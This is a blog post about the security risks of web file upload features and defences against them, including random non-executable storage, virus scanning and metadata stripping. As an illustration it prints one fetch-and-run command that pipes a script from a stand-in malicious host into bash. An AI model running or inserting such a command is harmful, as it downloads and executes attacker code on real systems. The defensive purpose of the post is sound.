chriscook.uk

The File Upload Rabbit Hole

Christopher Cook

Most experienced web application developers will have, at some point in their careers, been presented with design specifications requiring the provision of file upload features. Equally, they will also know that sinking feeling that accompanies what, on the face of it, seems like such a simple requirement.

File upload features allow users to upload arbitrary data to a website. Reasons for providing this feature range from image and video uploads on social media sites, PDF uploads for financial services sites, to document uploads for repository sites. However, as we will discuss, successfully implementing these features present many security and design challenges. Whilst the particular reasons for providing file upload features are not the focus of our discussion here, we will assume a generic use case arising from the requirement to upload some form of binary data to a website.

Penetration testers will pay close attention to any file upload feature when testing a site for vulnerabilities. Testing will typically involve the submission of EICAR test virus payloads, oversize payloads, wrongly named and wrongly sized payloads, payloads masquerading as different types of file content and so forth. They will carefully test the defences and responses of upload functions because they fully appreciate the problems that can arise when they are not properly secured.

Data Transfer

File upload functions are technically straightforward and well supported by both browsers and server side libraries. From a low level perspective, file upload data is captured by the browser and transferred to the web server as an HTTP multipart MIME POST request. This request may include both URL encoded form data, and binary payload data in a single request as shown below:

POST https://www.example.com/save_image HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14) Gecko/20100101 Firefox/83.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
XSRFID: 428baacf8af5b85ca4d739bf5f7f2cba
Content-Type: multipart/form-data; boundary=---------------------------2323327683319848131924
Content-Length: 384906
Origin: https://www.example.com
DNT: 1
Connection: keep-alive
Cookie: SESSID=f2b1c68534b296120f356cd39bfc36dd; XSRFID=428baacf8af5b85ca4d739bf5f7f2cba
Host: example.com

-----------------------------2323327683319848131924
Content-Disposition: form-data; name="sample"

sample_form_value=23
-----------------------------2323327683319848131924
Content-Disposition: form-data; name="image"; filename="image.jpg"
Content-Type: image/jpeg

...binary image data...
-----------------------------2323327683319848131924--

In this example, a random part delimiter string ---------------------------2323327683319848131924 is assigned in the Content-Type header. This delimiter string is sufficiently random as not to appear by accident in the binary payload. Each part of the multi-part mime request is separated by this string and a carriage return line feed (CRLF) combination. The final part is terminated by the same delimiter and two additional hyphens to mark the end of the request. On the server side, the application reads both the form data and binary data from this single request and processes accordingly.

Security Impact

Whilst the technical details of file upload functions are conceptually simple, real world security aspects of dealing with this request quickly become complex. To better understand this, we need to look at the upload process from an attackers perspective.

Within the field of information security, we need to concern ourselves with the risk exposed by certain system features. Typically, these risks will be categorized in terms of their impacts on the underlying system, and to the wider organisation. Of particular concern are software vulnerabilities leading to Remote Code Execution (RCE), or Arbitrary Code Execution (ACE). RCE is a particularly damaging type of server vulnerability in which a remote attacker with network access manages to install and execute their own code on our servers. Once malicious code is running on a server, the server effectively falls under the control of the attacker. In many cases this compromise will remain hidden, providing the attacker a foothold within the organisation to perform further system compromise.

From the perspective of a potential attacker, there are three steps required to achieve this code execution:

Get code onto the remote server
Locate this code
Execute this code

When we refer to code in this context, this is not necessarily full scale applications such as malware. Many remote code execution compromises consist of multi-stage execution processes. For an example, consider how most computers boot from cold start.

When we power on our computers, the first part of an initialization process begins in the computers non-volatile ROM or FLASH storage. This first stage typically reads a small piece of code contained within the first sector of the hard disk. This small piece of code in turn loads a larger, more functional piece of code which understands file system structures. This larger program loads the operating system kernel into memory and transfers control to it. Finally, the operating system will initialize itself before handing control to the user.

Many remote code execution exploits follow a similar process. The initial code that gets executed as part of step 3 above could be as simple as:

curl -s http://bad-or-compromised-website/hidden-directory/evil-script.sh | bash

This single line of code will download a larger, more capable script from a compromised server and execute it. Whilst this example is for Unix based servers, similar scripts can be constructed in PowerShell for Windows servers. Part of an attackers initial reconnaissance will involve the discovery of underlying operating systems.

Essentially, providing a file upload feature is the ready made provision of step 1. If the system allows the attacker to specify a filename that the server dutifully uses, step 2 may also be available to the attacker.

Considerations

Ideally, file upload functions should only be provided to registered users of the service. Even for services that allow users to self register, this extra layer allows patterns of abuse to be correlated to particular user accounts, allowing further investigation and action if required.

Upload functions should be subject to maximum upload sizes and rate limiting, which also allows for worst-case storage planning. For example, if 1000 users are allowed 10 uploads per day of 1mb maximum, worst case storage requirements are approx. 10Gb per day. When receiving this payload the maximum payload size should be strictly enforced to prevent unreasonably large payloads being uploaded. Many large payloads may exhaust the servers storage and cause a Denial Of Service (DOS) attack vector.

Critically, assume nothing about the contents of the file you have been given. Assume its contents to be hostile until proven otherwise. Any data that is provided alongside the binary payload such as date, time, filename, filetype or mime type, file size, etc. should be discarded, or logged before discarding. All this meta data can be very easily forged, so it is best to treat it as unreliable and ignore it.

Log all upload activity and store client information such as IP, UA agent identifier, etc. Again, whilst not necessarily reliable information, this will allow for correlation and investigation of potential abuse patterns.

This leaves us with the binary payload, which in most cases will be written to disk in a temporary storage location ready for further processing. Whilst the filename provided as part of the upload meta data can be used for information purposes, this filename should not be used as the disk filename.

The location and name of this temporary file should be carefully considered. Ideally, it should be totally random to provide protection against step 2 above, since the attacker now needs to determine both the filename and its location in order to execute it. It should also exist in a directory well away from the directory serving the website, possibly on a separate server or under a separate user from the user running the web server software. It should also have all execute permissions removed to help defend against step 3 above.

Once the browser upload process has completed, we should be left with a randomly named, non executable disk file stored in a protected directory, owned by a different user than the user running the web server. This user should have bare minimum filesystem permissions.

Before any further processing takes place, we should provide anti-virus scanners an opportunity to inspect the file for any known threats. This can be achieved by using on-access scanners to automatically scan the file once written to the filesystem, or on-demand scanners triggered after the initial file upload. Multiple virus and malware scanners could be considered, and a file hash could also be submitted to VirusTotal for an extra layer of assurance. Note that in the case of VirusTotal we are only submitting the SHA-256 hash of the file, not the file contents since this may lead to an Information Disclosure vulnerability. In all cases, the upload workflow should take account of these delays and afford the scanners time to do their work.

Since we cannot assume the file data corresponds to the specified file type, we should run additional steps to try to establish the payload contents are of the type expected by the function. A utility such as the linux file command may help to do this, which attempts to establish the corresponding mime type for any given binary file. Note however that this is not foolproof, and malicious binary payloads can still be constructed to defeat such utilities.

From this point, further payload processing depends on the actual design requirements. In most cases an attempt should be made to normalize this file into a format that is both useful and performant to the application. Images for example can be downsized and scaled to a standard size before storing.

Additional processing may also be required. Many file types such as images, PDFs and Word documents contain metadata, some of which may be of a personal nature. Unless there is a specific application use for this data, it is recommended to strip this before storing. For instance, many JPEG image files will contain EXIF data within the image which may include GPS co-ordinates of the image location.

Summary

Whilst there is no hard and fast guidance on how to deal with website binary file uploads, there are many steps we can take to help protect from threats posed by such features:

If possible, only allow file uploads for registered users to allow better monitoring of possible abuse patterns.
Limit the amount of data that can be uploaded, and the time over which it can uploaded to within sensible boundaries.
Assume nothing about the payload content or its metadata until properly verified.
If possible, the majority of the post-upload processing should be done by separate low privilege processes and users to limit any damage caused by malicious payloads.
Antivirus scanners should be used to inspect the payload content before further processing.
Type of payload data should be assessed independently from the browser specified file type.
Additional meta data provided in many popular file formats should be neutralized or removed before assigning to permanent storage.
Some form of normalization may be required to align the uploaded data with optimal system usage and storage requirements.
Log as much about the upload and post-processing as required to allow abuse patterns to be detected. If GDPR restrictions limit or prevent the use of such extensive logging, hashing or keyed hashing of relevant information can be considered.
Carefully test the upload feature from the perspective of an attacker.
Carefully load test the upload feature to ensure the application can cope and not cause denial of service issues.
Monitor upload activity over time in the production environment to establish normal usage patterns within typical user workflows, and regularly check upload activity against these patterns. This can all be easily automated.
If there is any doubt about the content of the payload, either discard entirely or quarantine for further manual security intervention. It is better to have a few false positives and upload delays than suffer a complete server or organisation compromise.